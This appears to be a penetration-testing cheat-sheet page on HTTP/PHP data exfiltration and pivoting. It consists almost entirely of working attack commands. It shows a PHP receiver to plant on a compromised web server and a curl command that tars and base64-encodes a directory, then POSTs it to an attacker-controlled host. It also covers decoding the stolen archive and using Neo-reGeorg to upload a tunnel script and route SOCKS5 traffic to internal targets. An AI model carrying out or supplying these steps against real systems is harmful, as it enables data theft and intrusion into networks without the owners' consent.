48 lines
1004 B
Markdown
48 lines
1004 B
Markdown
|
# HTTP/PHP Exfiltration
|
||
|
|
|
||
|
|
* On a pwned web server concat the following PHP code to an existing page
|
||
|
|
```php
|
||
|
|
<?php
|
||
|
|
if (isset($_POST['file'])) {
|
||
|
|
$file = fopen("/tmp/out.b64","w");
|
||
|
|
fwrite($file, $_POST['file']);
|
||
|
|
fclose($file);
|
||
|
|
}
|
||
|
|
?>
|
||
|
|
```
|
||
|
|
|
||
|
|
* POST the payload to the controlled web server
|
||
|
|
```sh
|
||
|
|
curl --data "file=$(tar zcf - <directory> | base64)" http://example.com/about.php
|
||
|
|
```
|
||
|
|
|
||
|
|
* Prepare the stored file through removing the url encoding
|
||
|
|
```sh
|
||
|
|
sudo sed -i 's/ /+/g' /tmp/out.b64
|
||
|
|
```
|
||
|
|
|
||
|
|
* Unarchive the data
|
||
|
|
```sh
|
||
|
|
cat /tmp/out.b64 | base64 -d | tar xvfz -
|
||
|
|
```
|
||
|
|
|
||
|
|
## Pivot via Tunneling over HTTP
|
||
|
|
|
||
|
|
* [Neo-reGeorg's tool](https://github.com/L-codes/Neo-reGeorg)
|
||
|
|
|
||
|
|
* Generate an encrypted client with a key via
|
||
|
|
```sh
|
||
|
|
python3 neoreg.py generate -k key.enc
|
||
|
|
```
|
||
|
|
|
||
|
|
* Upload `tunnel.php` to the web server created
|
||
|
|
* Trigger the tunnel via
|
||
|
|
```sh
|
||
|
|
python3 neoreg.py -k key.enc -u http://example.com/tunnel.php
|
||
|
|
```
|
||
|
|
|
||
|
|
* Start socks5 via
|
||
|
|
```sh
|
||
|
|
curl --socks5 127.0.0.1:1080 http://target.example.com
|
||
|
|
```
|